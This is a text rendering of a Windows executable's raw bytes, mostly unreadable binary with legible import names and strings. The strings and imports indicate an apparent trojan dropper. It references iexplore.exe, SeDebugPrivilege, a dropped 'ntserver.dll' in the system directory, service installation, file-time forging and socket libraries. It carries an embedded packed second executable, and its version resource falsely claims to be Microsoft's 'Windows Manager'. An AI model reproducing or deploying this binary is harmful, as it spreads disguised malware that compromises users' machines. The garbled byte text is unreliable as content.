GetEnvironmentVariableA uGetVersionExA �HeapDestroy �HeapCreate  �VirtualFree �HeapFree  �WriteFile SGetStringTypeA  VGetStringTypeW  �HeapAlloc � GetCPInfo � GetACP  1GetOEMCP  �VirtualAlloc  �HeapReAlloc �LoadLibraryA                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    �.@                                 C:\Program Files\Internet Explorer\iexplore.exe Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE    Kernel32    LoadLibraryA    SeDebugPrivilege    \ntserver.dll   iexplore.exe     �            Z@    a@ a@                     ( ( ( ( (                                     H                � � � � � � � � � �        � � � � � �                           � � � � � �                                                                                                                                                                                                                                                                                                .            �         �       �  �       �  �       �  �       �  �       �  �       �  �       �  �       �  �             
   �   ���� 
            �S@    �S@ 	   dS@ 
   @S@    S@    �R@    �R@    �R@    \R@    4R@    �Q@    �Q@    �Q@ x   �Q@ y   |Q@ z   lQ@ �   hQ@ �   XQ@     �  `�y�!       ��      ��      ����    @~��    �  ��ڣ                        ��      @�      �  ��ڣ                        ��      A�      �  Ϣ� ��[                 ��      @~��    Q  Q�^�  _�j�2                 ������  1~��            Pe@ Pe@ he@ he@ ���������   �                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   Pe@ �                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  �   4  GetEnvironmentVariableA lstrcpyA lstrcatA GetCurrentProcess SetPriorityClass GetCurrentThread SetThreadPriority CreateProcessA GetShortPathNameA LoadResource SizeofResource FindResourceA lstrlenA GetLastError SetFileAttributesA GetModuleHandleA GetStartupInfoA GetModuleFileNameA Sleep SetLocalTime CloseHandle SetFileTime WriteFile GetFileTime CreateFileA GetSystemDirectoryA GlobalFree LockResource ResumeThread GlobalAlloc  �      CreateServiceA OpenServiceA StartServiceA RegSetValueExA CloseServiceHandle RegCloseKey RegOpenKeyExA StartServiceCtrlDispatcherA RegOpenKeyA RegisterServiceCtrlHandlerA SetServiceStatus OpenSCManagerA  �   �  �(����/�9�1���H���������������	�����@�q���K���R�����Z����
������\	�O�A�R�c��	��	������ �� �   h  _controlfp __set_app_type __p__fmode __p__commode _adjust_fdiv __setusermatherr _initterm _acmdln memset _setmbcp exit _XcptFilter _exit _onexit __dllonexit strlen strncmp strstr strcpy _except_handler3 memcpy __CxxFrameHandler strcat __getmainargs  �   �  wsprintfA  �   �  �s      PE  L xqH        �      p     �           @                      �                                      `#  �    @  �C                                                                             �                          .text                             `.rdata  4
                         @  @.data   �   0      0              @  �.rsrc   �C  @   P  @              @  @ � �%    ~� -Z4[�;C�8�v�i����n[���U�-����v��Y�D�7�pS��U��K��D�J�L��7�^#9�t�ڗ3���
Y`HLW�uf�Ktj d_|��G��t�� T�C
+�h�w���N��?~�^�^���J!Ja��G���+ ��z�7W8R��#\�D��u8K��fy�!��O��b+���)�\6�,����"�hz9�-h���yut[3�^d�|�"�4��n(�Q!�d��Ͳ��})��ُm� �b�����	;
��.�	|��/(�N�.��b ){����0X�	�t��/��
� ���ud�mK��"2���Qa�y>u;�F���nK;����o�_��I�m�����[u0\�PoCz*�?W�3(��j�t���,�=
h�Ad����E0�4�3��j*~�Ft*U P�u�W�]��v���Zk�w|N!�Q-v��bAW���ž�у��q�A3��hv��O�C�7i��bl}�Z�0��@[�m�J���u��������7���TTt�;�w<�/m-wH���m���@��B����Hǀ�7��H�E�O@���_&���^����Ad�DB����8�>C������z�NCu	x��������!gث�.��p`e$R̾P#���h  d	�Yr�;-�y�\�w@)��ձ�fz�"'�3�W�[�^[�;9q	l�����T���m��Q���5����=�g���G�F��n��~����R� g����J#�JE���2a��Ã��|�W��[��Щ�;�s��B�:ѯ�~�G�QǴ��p�",�'�T��~����t�X�� ��0C�#x295p������	B Q�Nl]G���Y��#��rW�pf5�6:���v�|g�?V?�u9�l�6V�yP�1n����P�(l�S�!;�7\5܁�t��/������}�,&X"��΋�t,�yQ&���e�A Z�BQ� ��l�0Q�P*�;�%'�I�m�{���"n7���;7vr6�ѥ�t7f�Z+e��1V����n�pS�r I���K��f�+�+�^��T��[B�PV�h�+ITE&�~���,l��!8P^��c[����5e %���!B]^���,�`V���~m�ڽR� �+��zx�o��;��s:��;�`�|9_vS0�%4�u��A���7r�F5L\ȝ[~ބ-��Ks3�;�|LfPZ7YCjN&K�;=�A�DR;Er�E6;c�����Ck�)`�����(i�5u[�� �?�R��m5ҋ_�l��C��2+��������w;~}.����t����3
 VV�h�:-4����}&
��V�k참��f*mc~�����n:��dPP�����Ah%&��i��
]u�L��6o�m�;�s�9{���#
�G�?)X���)]�ێR� �4�4��F��)�Y�u�ılu+�]!�z�)P��3ͣ��6����7Lp	9���V���ar.�_���s)QŃa�k+5��<�D���C|���Ơ;�sz%������;X^�Uxk�uCFIQsN;Ln����)�9U��-�{@�i���텷�Aus��q��s~z2D�3�v���ܵ`Q^X%C@�+fo�P�	+�T���8�1���&�s)Eh�t�r4����7�����AЈ�B��k��9#�����uBh4�ׄT���gx⎨B�hxT��k��)tPhh�?�� �֣$���G7���at��m��6S�1�W OMǺx`���OW�z.�k	D�.��m/E�͕�uo��_�!��GIt%�f��u�-Q��� LP+�/��R�b	bé���(�:2"j�;�:�l.�*j;U���c�9y������5��e,3Ɲ���9���	��4 �S����U
�_Dnخa�u����&h���G�������r-��ho�-Ft���|�BF����
��}��@�t�g#JɫNX�V�,�C誂�3%!z�����a���-P����� �L�OG��f}(H���RtE�t�FX��Bd�k��!D-=�hBt�����>D���[�b�Z1B©[��1@��/��#hH�GxH��v#�����G�X/\/�E/ %/��,?_LD<E��i4,$H�B�/	��� Y����H/!9 J�I��~�!,�8`IX�VX/)/�)/��,[����E��i����I�B�/X��(<J/ \ u��¨�M�,�W�V�Ķi��s 4BR(�i����� M�4��U��d�:4M�u?FXft��4MӠ����i�eX :Rl��i�~�����4˦i��Y�4M�,>JV`5Ml|���۪B�X�`!x�#����hlTAߵ__GLO
�_��3EAP_SELEC�� ��,GrunP~S� error�7�5T�TASS-{�ING�emCSMAR6028"zy�- Kablto �}��Cializheap7'5 �7neػ�ugh spac#f{lowi8e�

7�S�6std5��o?pur+virtu!3��Ŷ�c# cl(_4���_*j�^{�/X��_ws_�19�opeX1so��mdesc+#M"ܚ$�edWm�7#7mul�tنC�!ck/�B4֜ �.�# h�!rm��£�t�/���09OA�k4�*+0.+8žO!argu(sX����+2f�nng ֺث�:d�o�pM-`9fVisۃ��C++ R�Lib�r=�y'
-E!��h�P��.�k� #��%�'�m,klwn>7(7q���/La{/ܱ>AveP�up �@47� �R��R]UBoQus1�`Q��T˗\./�VP�T,PB�WP� �I`VM=��YETk�R�"j��6�ϝ>)"Addr&&5~Mod�K�[j4�Wri4I��JMA�Vն��AlExl�r2�l�n��}"�=�	�N��˺{�FD4/v�t�L�To��lp����S=psh���R��&vhP����u[�g��@�Ke�{Que^�Z�9V�7�r��?��  A�6��h�k��iV����~����k�6�-�B/B�4��(�<�/RtlUnw� ʕomm���5VL?t���5ޗ�!<�1�ݜCh���JvXM�By� ��֒ Sa�%MLCM,S{�Q��:�����$A^ ��ah�dE�d�պ�Fܗ$�i�eN�U�Cg�*{8�_s�-�m�zI[`��)�
3Z�m�y+5�,�g�Rh zg��;�J���a�pI��m�n��	[�	�>h["A�t��#�HDe�ol̈m!��ݿҋ��� �
o���߁}S�ukx�%Vљ�E�;$UP�?[�� ��31OEM�-!}�U=����ٳȂ�A%�*�.�OVOC:\ %s��E�\�W��h[up�r\i=�e	�S���]vwa\�\3j�9Ŵ3Q�\App �R���EXPLORE�$^�oK`lw#�%Z�Q�bug#xI�wE.a!� �@�T_Ze�=F!a@!�L2( H ��L$�!!�� v`?� ��B; |�n .  � ���Ȗ���Ȁ��Ȁȑ��و�
��
�`�d����5�S�[	d���g/@'M�4��R��6M�4\4�Qk��Y��xM�4�y|zl��M�4h�X�웨d`�y�!��߽�O������:�~��=�x�/���ڣ{��C`��@�/A��� �Ϣ����[_�;�
~�	Q�^ڏ��J~_�j�2Ӗ��6q��~9 !�g
Rh� �{�k�WQ B ���A0�(P����A'Т:K4l�Ap��?cpye��	at��~�=SeiotyCla$�� X�#
Um�)Um���4Sht+�Q����^RoK#C�j٥Cof������Y��[�b�z)�ti�D��buqkU����b t��Q�3Tim�ɖU�l^�f�M�f��� VT�L�d�+`�ck�Z�	uCV'�鬀�ѠІU�_ѱ	+���D�ePg�$�͆��Չ  ���0aNC������sp}chA+�,`�i�r,`)�
��w$PՅ��-��M��(����/91������H��������[��_����	��@r۶mq&�K�R�e��Z8�
��۶�۴�\	�OA>Rc�۶m&���;��n�lض t���nh_cmw$��fp_s���"�_�_�k��	_fmH��j�+mF��`67Um�U9��|���K*cm&n��ιm&mbco�G��X_.o���Zb��m;l#�ދ�,�z��=Q��-tnlld�4abg�"h�a��R�i����w
�4ۅfA���s����� x,�s�p� "h��/ 	�.`# ��R��C�DЭ���"H�U �`v 	�4
��'�� HN��00�al��@�����O ��%~�       H �            `� 0A �� ���W�����������F�G�u�����r�   �u�������s�u	�����s�1Ƀ�r���F���tt���u�������u������u A�u�������s�u	�����s���� ������/���v�B�GIu��c������������w���L���^���E   �G,�<w��?u��_f������)�����������ٍ� � �	�tE�_��0�� �P����@� ��G�t܉�y�GPG�WH�U��D� 	�t�������H� a��q��                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 �  �(  ��  �h  �   �  �               �   @  �                 X   �C   �                        �   �  �                 �   ��  �                            �  �                 �   �� �           D L L  E X E  A  �4   V S _ V E R S I O N _ I N F O     ���                 ?                            S t r i n g F i l e I n f o   �   0 8 0 4 0 4 b 0   L   C o m p a n y N a m e     M i c r o s o f t   C o r p o r a t i o n   H   F i l e D e s c r i p t i o n     W i n d o w s   M a n a g e r   (   F i l e V e r s i o n     1 . 5        I n t e r n a l N a m e   j #  L e g a l C o p y r i g h t   C o p y r i g h t   ( C )   M i c r o s o f t   C o r p .   2 0 0 1     (    O r i g i n a l F i l e n a m e   @   P r o d u c t N a m e     W i n d o w s   M a n a g e r   ,   P r o d u c t V e r s i o n   1 . 5   D    V a r F i l e I n f o     $    T r a n s l a t i o n     �            x� @�             �� P�             �� X�             �� `�             �� h�             �� p�                           	       j       k       l       c       m       KERNEL32.DLL ADVAPI32.dll MFC42.DLL MSVCRT.dll USER32.dll WSOCK32.dll   LoadLibraryA  GetProcAddress  ExitProcess   RegCloseKey   exit  wsprintfA                                                                                                                                                                                                                                                                   �� �!              �� �               �� �!              �� h!              ��                 �� 4                       WSOCK32.dll MFC42.DLL USER32.dll   wsprintfA MSVCRT.dll   __getmainargs   strcat   __CxxFrameHandler   memcpy   _except_handler3   strcpy   strstr   strncmp   strlen   __dllonexit   _onexit   _exit   _XcptFilter   exit   _setmbcp   memset   _acmdln   _initterm   __setusermatherr   _adjust_fdiv   __p__commode   __p__fmode   __set_app_type   _controlfp ADVAPI32.dll   OpenSCManagerA   SetServiceStatus   RegisterServiceCtrlHandlerA   RegOpenKeyA   StartServiceCtrlDispatcherA   RegOpenKeyExA   RegCloseKey   CloseServiceHandle   RegSetValueExA   StartServiceA   OpenServiceA   CreateServiceA KERNEL32.DLL   GlobalAlloc   ResumeThread   LockResource   GlobalFree   GetSystemDirectoryA   CreateFileA   GetFileTime   WriteFile   SetFileTime   CloseHandle   SetLocalTime   Sleep   GetModuleFileNameA   GetStartupInfoA   GetModuleHandleA   SetFileAttributesA   GetLastError   lstrlenA   FindResourceA   SizeofResource   LoadResource   GetShortPathNameA   CreateProcessA   SetThreadPriority   GetCurrentThread   SetPriorityClass   GetCurrentProcess   lstrcatA   lstrcpyA   GetEnvironmentVariableA